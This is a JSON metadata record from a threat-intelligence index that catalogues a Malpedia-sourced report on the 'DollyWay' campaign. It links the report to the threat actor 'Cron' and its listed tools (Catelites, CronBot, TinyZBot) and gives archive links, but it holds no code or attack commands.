	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.godaddy.com/resources/news/dollyway-world-domination"
	],
	"report_names": [
		"dollyway-world-domination"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3fde87f597cecbd40ba069b1bdf2876c13ead98.pdf",
		"text": "https://archive.orkl.eu/a3fde87f597cecbd40ba069b1bdf2876c13ead98.txt",
		"img": "https://archive.orkl.eu/a3fde87f597cecbd40ba069b1bdf2876c13ead98.jpg"
	}
}